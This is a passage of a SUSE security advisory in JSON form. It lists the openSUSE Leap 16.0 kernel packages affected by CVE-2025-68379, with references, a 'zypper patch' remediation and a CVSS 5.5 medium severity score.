"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
